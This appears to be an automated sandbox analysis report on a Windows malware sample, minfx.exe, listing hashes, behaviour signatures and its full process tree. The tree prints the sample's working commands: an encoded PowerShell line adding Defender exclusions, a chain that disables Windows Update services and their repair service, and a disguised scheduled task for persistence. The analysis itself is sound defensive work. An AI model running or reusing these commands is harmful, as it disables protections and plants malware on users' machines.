General
Target

minfx.exe

Filesize

4MB

Completed

13-05-2022 17:57

Task

behavioral1

Score
8/10
MD5

8268ff95b3aaea6d6de8f02a73c323d2

SHA1

ae470145c4f5780315b52aa1c57ae0c04a2d18ca

SHA256

529831a3e5b7b61f74f7a426e828210017daf1eea2cbf7cf997c13d82822aef8

SHA256

9603dde1bfd9874637e63a268a7c8f85032892b4e58d3f96678dfbb52b453a972e00cd49077574e58726d3c5045788ede5a9b81c89a464342d5b64070c7325c0

Malware Config
Signatures 11

Filter: none

Defense Evasion
Impact
Persistence
  • Executes dropped EXE
    updater.exe

    Reported IOCs

    pidprocess
    1036updater.exe
  • Possible privilege escalation attempt
    takeown.exeicacls.exe

    Tags

    Reported IOCs

    pidprocess
    1296takeown.exe
    688icacls.exe
  • Stops running service(s)

    Tags

    TTPs

    Modify Existing ServiceService Stop
  • Loads dropped DLL
    cmd.exe

    Reported IOCs

    pidprocess
    1784cmd.exe
  • Modifies file permissions
    takeown.exeicacls.exe

    Tags

    TTPs

    File Permissions Modification

    Reported IOCs

    pidprocess
    1296takeown.exe
    688icacls.exe
  • Drops file in System32 directory
    powershell.exe

    Reported IOCs

    descriptioniocprocess
    File opened for modificationC:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnkpowershell.exe
  • Launches sc.exe

    Description

    Sc.exe is a Windows utlilty to control services on the system.

  • Creates scheduled task(s)
    schtasks.exe

    Description

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    TTPs

    Scheduled Task

    Reported IOCs

    pidprocess
    1608schtasks.exe
  • Suspicious behavior: EnumeratesProcesses
    powershell.execonhost.exe

    Reported IOCs

    pidprocess
    1632powershell.exe
    1092conhost.exe
  • Suspicious use of AdjustPrivilegeToken
    powershell.exepowercfg.exepowercfg.exepowercfg.exepowercfg.execonhost.exe

    Reported IOCs

    descriptionpidprocess
    Token: SeDebugPrivilege1632powershell.exe
    Token: SeShutdownPrivilege1544powercfg.exe
    Token: SeShutdownPrivilege896powercfg.exe
    Token: SeShutdownPrivilege1784powercfg.exe
    Token: SeShutdownPrivilege364powercfg.exe
    Token: SeDebugPrivilege1092conhost.exe
  • Suspicious use of WriteProcessMemory
    minfx.execonhost.execmd.execmd.execmd.execmd.exe

    Reported IOCs

    descriptionpidprocesstarget process
    PID 1992 wrote to memory of 10921992minfx.execonhost.exe
    PID 1992 wrote to memory of 10921992minfx.execonhost.exe
    PID 1992 wrote to memory of 10921992minfx.execonhost.exe
    PID 1992 wrote to memory of 10921992minfx.execonhost.exe
    PID 1092 wrote to memory of 18361092conhost.execmd.exe
    PID 1092 wrote to memory of 18361092conhost.execmd.exe
    PID 1092 wrote to memory of 18361092conhost.execmd.exe
    PID 1836 wrote to memory of 16321836cmd.exepowershell.exe
    PID 1836 wrote to memory of 16321836cmd.exepowershell.exe
    PID 1836 wrote to memory of 16321836cmd.exepowershell.exe
    PID 1092 wrote to memory of 5881092conhost.execmd.exe
    PID 1092 wrote to memory of 5881092conhost.execmd.exe
    PID 1092 wrote to memory of 5881092conhost.execmd.exe
    PID 1092 wrote to memory of 7761092conhost.execmd.exe
    PID 1092 wrote to memory of 7761092conhost.execmd.exe
    PID 1092 wrote to memory of 7761092conhost.execmd.exe
    PID 588 wrote to memory of 1156588cmd.exesc.exe
    PID 588 wrote to memory of 1156588cmd.exesc.exe
    PID 588 wrote to memory of 1156588cmd.exesc.exe
    PID 588 wrote to memory of 1660588cmd.exesc.exe
    PID 588 wrote to memory of 1660588cmd.exesc.exe
    PID 588 wrote to memory of 1660588cmd.exesc.exe
    PID 776 wrote to memory of 1544776cmd.exepowercfg.exe
    PID 776 wrote to memory of 1544776cmd.exepowercfg.exe
    PID 776 wrote to memory of 1544776cmd.exepowercfg.exe
    PID 588 wrote to memory of 1000588cmd.exesc.exe
    PID 588 wrote to memory of 1000588cmd.exesc.exe
    PID 588 wrote to memory of 1000588cmd.exesc.exe
    PID 588 wrote to memory of 1760588cmd.exesc.exe
    PID 588 wrote to memory of 1760588cmd.exesc.exe
    PID 588 wrote to memory of 1760588cmd.exesc.exe
    PID 588 wrote to memory of 1620588cmd.exesc.exe
    PID 588 wrote to memory of 1620588cmd.exesc.exe
    PID 588 wrote to memory of 1620588cmd.exesc.exe
    PID 776 wrote to memory of 896776cmd.exepowercfg.exe
    PID 776 wrote to memory of 896776cmd.exepowercfg.exe
    PID 776 wrote to memory of 896776cmd.exepowercfg.exe
    PID 588 wrote to memory of 1696588cmd.exesc.exe
    PID 588 wrote to memory of 1696588cmd.exesc.exe
    PID 588 wrote to memory of 1696588cmd.exesc.exe
    PID 776 wrote to memory of 1784776cmd.exepowercfg.exe
    PID 776 wrote to memory of 1784776cmd.exepowercfg.exe
    PID 776 wrote to memory of 1784776cmd.exepowercfg.exe
    PID 776 wrote to memory of 364776cmd.exepowercfg.exe
    PID 776 wrote to memory of 364776cmd.exepowercfg.exe
    PID 776 wrote to memory of 364776cmd.exepowercfg.exe
    PID 588 wrote to memory of 1444588cmd.exesc.exe
    PID 588 wrote to memory of 1444588cmd.exesc.exe
    PID 588 wrote to memory of 1444588cmd.exesc.exe
    PID 588 wrote to memory of 1736588cmd.exesc.exe
    PID 588 wrote to memory of 1736588cmd.exesc.exe
    PID 588 wrote to memory of 1736588cmd.exesc.exe
    PID 1092 wrote to memory of 20321092conhost.execmd.exe
    PID 1092 wrote to memory of 20321092conhost.execmd.exe
    PID 1092 wrote to memory of 20321092conhost.execmd.exe
    PID 588 wrote to memory of 1100588cmd.exesc.exe
    PID 588 wrote to memory of 1100588cmd.exesc.exe
    PID 588 wrote to memory of 1100588cmd.exesc.exe
    PID 2032 wrote to memory of 16082032cmd.exeschtasks.exe
    PID 2032 wrote to memory of 16082032cmd.exeschtasks.exe
    PID 2032 wrote to memory of 16082032cmd.exeschtasks.exe
    PID 588 wrote to memory of 904588cmd.exesc.exe
    PID 588 wrote to memory of 904588cmd.exesc.exe
    PID 588 wrote to memory of 904588cmd.exesc.exe
Processes 44
  • C:\Users\Admin\AppData\Local\Temp\minfx.exe
    "C:\Users\Admin\AppData\Local\Temp\minfx.exe"
    Suspicious use of WriteProcessMemory
    PID:1992
    • C:\Windows\System32\conhost.exe
      "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\minfx.exe"
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:1092
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAHEAeQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHQAeABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAcwAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBiAHoAaABiACMAPgA="
        Suspicious use of WriteProcessMemory
        PID:1836
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -EncodedCommand "PAAjAHEAeQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHQAeABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAcwAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBiAHoAaABiACMAPgA="
          Drops file in System32 directory
          Suspicious behavior: EnumeratesProcesses
          Suspicious use of AdjustPrivilegeToken
          PID:1632
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" cmd /c sc stop wuauserv & sc stop bits & sc stop dosvc & sc stop UsoSvc & sc stop WaaSMedicSvc & sc config wuauserv start= disabled & sc failure wuauserv reset= 0 actions= "" & sc config bits start= disabled & sc failure bits reset= 0 actions= "" & sc config dosvc start= disabled & sc failure dosvc reset= 0 actions= "" & sc config UsoSvc start= disabled & sc failure UsoSvc reset= 0 actions= "" & sc config wuauserv start= disabled & sc failure wuauserv reset= 0 actions= "" & takeown /f C:\\Windows\\System32\\WaaSMedicSvc.dll & icacls C:\\Windows\\System32\\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename C:\\Windows\\System32\\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f & reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sih" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sihboot" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantWakeupRun" /DISABLE
        Suspicious use of WriteProcessMemory
        PID:588
        • C:\Windows\system32\sc.exe
          sc stop wuauserv
          PID:1156
        • C:\Windows\system32\sc.exe
          sc stop bits
          PID:1660
        • C:\Windows\system32\sc.exe
          sc stop dosvc
          PID:1000
        • C:\Windows\system32\sc.exe
          sc stop UsoSvc
          PID:1760
        • C:\Windows\system32\sc.exe
          sc stop WaaSMedicSvc
          PID:1620
        • C:\Windows\system32\sc.exe
          sc config wuauserv start= disabled
          PID:1696
        • C:\Windows\system32\sc.exe
          sc failure wuauserv reset= 0 actions= ""
          PID:1444
        • C:\Windows\system32\sc.exe
          sc config bits start= disabled
          PID:1736
        • C:\Windows\system32\sc.exe
          sc failure bits reset= 0 actions= ""
          PID:1100
        • C:\Windows\system32\sc.exe
          sc config dosvc start= disabled
          PID:904
        • C:\Windows\system32\sc.exe
          sc failure dosvc reset= 0 actions= ""
          PID:1576
        • C:\Windows\system32\sc.exe
          sc config UsoSvc start= disabled
          PID:1772
        • C:\Windows\system32\sc.exe
          sc failure UsoSvc reset= 0 actions= ""
          PID:1832
        • C:\Windows\system32\sc.exe
          sc config wuauserv start= disabled
          PID:660
        • C:\Windows\system32\sc.exe
          sc failure wuauserv reset= 0 actions= ""
          PID:692
        • C:\Windows\system32\takeown.exe
          takeown /f C:\\Windows\\System32\\WaaSMedicSvc.dll
          Possible privilege escalation attempt
          Modifies file permissions
          PID:1296
        • C:\Windows\system32\icacls.exe
          icacls C:\\Windows\\System32\\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
          Possible privilege escalation attempt
          Modifies file permissions
          PID:688
        • C:\Windows\system32\reg.exe
          reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f
          PID:580
        • C:\Windows\system32\reg.exe
          reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f
          PID:1844
        • C:\Windows\system32\reg.exe
          reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AUOptions /d 2 /t REG_DWORD /f
          PID:908
        • C:\Windows\system32\reg.exe
          reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
          PID:1436
        • C:\Windows\system32\reg.exe
          reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
          PID:456
        • C:\Windows\system32\reg.exe
          reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
          PID:1668
        • C:\Windows\system32\schtasks.exe
          SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Automatic App Update" /DISABLE
          PID:932
        • C:\Windows\system32\schtasks.exe
          SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Start" /DISABLE
          PID:1320
        • C:\Windows\system32\schtasks.exe
          SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sih" /DISABLE
          PID:1960
        • C:\Windows\system32\schtasks.exe
          SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sihboot" /DISABLE
          PID:1988
        • C:\Windows\system32\schtasks.exe
          SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistant" /DISABLE
          PID:1004
        • C:\Windows\system32\schtasks.exe
          SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantCalendarRun" /DISABLE
          PID:1512
        • C:\Windows\system32\schtasks.exe
          SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantWakeupRun" /DISABLE
          PID:824
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
        Suspicious use of WriteProcessMemory
        PID:776
        • C:\Windows\system32\powercfg.exe
          powercfg /x -hibernate-timeout-ac 0
          Suspicious use of AdjustPrivilegeToken
          PID:1544
        • C:\Windows\system32\powercfg.exe
          powercfg /x -hibernate-timeout-dc 0
          Suspicious use of AdjustPrivilegeToken
          PID:896
        • C:\Windows\system32\powercfg.exe
          powercfg /x -standby-timeout-ac 0
          Suspicious use of AdjustPrivilegeToken
          PID:1784
        • C:\Windows\system32\powercfg.exe
          powercfg /x -standby-timeout-dc 0
          Suspicious use of AdjustPrivilegeToken
          PID:364
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" cmd /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "C:\Users\Admin\AppData\Roaming\Chrome\updater.exe"
        Suspicious use of WriteProcessMemory
        PID:2032
        • C:\Windows\system32\schtasks.exe
          schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "C:\Users\Admin\AppData\Roaming\Chrome\updater.exe"
          Creates scheduled task(s)
          PID:1608
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" cmd /c "C:\Users\Admin\AppData\Roaming\Chrome\updater.exe"
        Loads dropped DLL
        PID:1784
        • C:\Users\Admin\AppData\Roaming\Chrome\updater.exe
          C:\Users\Admin\AppData\Roaming\Chrome\updater.exe
          Executes dropped EXE
          PID:1036
Network
MITRE ATT&CK Matrix
Collection
    Command and Control
      Credential Access
        Discovery
          Execution
            Exfiltration
              Impact
              Initial Access
                Lateral Movement
                  Privilege Escalation
                    Replay Monitor
                    00:00 00:00
                    Downloads
                    • C:\Users\Admin\AppData\Roaming\Chrome\updater.exe

                      MD5

                      8268ff95b3aaea6d6de8f02a73c323d2

                      SHA1

                      ae470145c4f5780315b52aa1c57ae0c04a2d18ca

                      SHA256

                      529831a3e5b7b61f74f7a426e828210017daf1eea2cbf7cf997c13d82822aef8

                      SHA512

                      9603dde1bfd9874637e63a268a7c8f85032892b4e58d3f96678dfbb52b453a972e00cd49077574e58726d3c5045788ede5a9b81c89a464342d5b64070c7325c0

                    • \Users\Admin\AppData\Roaming\Chrome\updater.exe

                      MD5

                      8268ff95b3aaea6d6de8f02a73c323d2

                      SHA1

                      ae470145c4f5780315b52aa1c57ae0c04a2d18ca

                      SHA256

                      529831a3e5b7b61f74f7a426e828210017daf1eea2cbf7cf997c13d82822aef8

                      SHA512

                      9603dde1bfd9874637e63a268a7c8f85032892b4e58d3f96678dfbb52b453a972e00cd49077574e58726d3c5045788ede5a9b81c89a464342d5b64070c7325c0

                    • memory/364-75-0x0000000000000000-mapping.dmp

                    • memory/456-93-0x0000000000000000-mapping.dmp

                    • memory/580-89-0x0000000000000000-mapping.dmp

                    • memory/588-64-0x0000000000000000-mapping.dmp

                    • memory/660-85-0x0000000000000000-mapping.dmp

                    • memory/688-88-0x0000000000000000-mapping.dmp

                    • memory/692-86-0x0000000000000000-mapping.dmp

                    • memory/776-65-0x0000000000000000-mapping.dmp

                    • memory/824-101-0x0000000000000000-mapping.dmp

                    • memory/896-72-0x0000000000000000-mapping.dmp

                    • memory/904-81-0x0000000000000000-mapping.dmp

                    • memory/908-91-0x0000000000000000-mapping.dmp

                    • memory/932-95-0x0000000000000000-mapping.dmp

                    • memory/1000-69-0x0000000000000000-mapping.dmp

                    • memory/1004-99-0x0000000000000000-mapping.dmp

                    • memory/1036-104-0x0000000000000000-mapping.dmp

                    • memory/1092-56-0x000000001B680000-0x000000001BAA0000-memory.dmp

                    • memory/1092-54-0x0000000000150000-0x000000000058E000-memory.dmp

                    • memory/1092-57-0x000007FEFB871000-0x000007FEFB873000-memory.dmp

                    • memory/1092-55-0x000000001BAC0000-0x000000001BEFE000-memory.dmp

                    • memory/1100-79-0x0000000000000000-mapping.dmp

                    • memory/1156-66-0x0000000000000000-mapping.dmp

                    • memory/1296-87-0x0000000000000000-mapping.dmp

                    • memory/1320-96-0x0000000000000000-mapping.dmp

                    • memory/1436-92-0x0000000000000000-mapping.dmp

                    • memory/1444-76-0x0000000000000000-mapping.dmp

                    • memory/1512-100-0x0000000000000000-mapping.dmp

                    • memory/1544-68-0x0000000000000000-mapping.dmp

                    • memory/1576-82-0x0000000000000000-mapping.dmp

                    • memory/1608-80-0x0000000000000000-mapping.dmp

                    • memory/1620-71-0x0000000000000000-mapping.dmp

                    • memory/1632-61-0x000007FEED860000-0x000007FEEE3BD000-memory.dmp

                    • memory/1632-59-0x0000000000000000-mapping.dmp

                    • memory/1632-63-0x00000000026EB000-0x000000000270A000-memory.dmp

                    • memory/1632-62-0x00000000026E4000-0x00000000026E7000-memory.dmp

                    • memory/1660-67-0x0000000000000000-mapping.dmp

                    • memory/1668-94-0x0000000000000000-mapping.dmp

                    • memory/1696-73-0x0000000000000000-mapping.dmp

                    • memory/1736-77-0x0000000000000000-mapping.dmp

                    • memory/1760-70-0x0000000000000000-mapping.dmp

                    • memory/1772-83-0x0000000000000000-mapping.dmp

                    • memory/1784-74-0x0000000000000000-mapping.dmp

                    • memory/1784-102-0x0000000000000000-mapping.dmp

                    • memory/1832-84-0x0000000000000000-mapping.dmp

                    • memory/1836-58-0x0000000000000000-mapping.dmp

                    • memory/1844-90-0x0000000000000000-mapping.dmp

                    • memory/1960-97-0x0000000000000000-mapping.dmp

                    • memory/1988-98-0x0000000000000000-mapping.dmp

                    • memory/2032-78-0x0000000000000000-mapping.dmp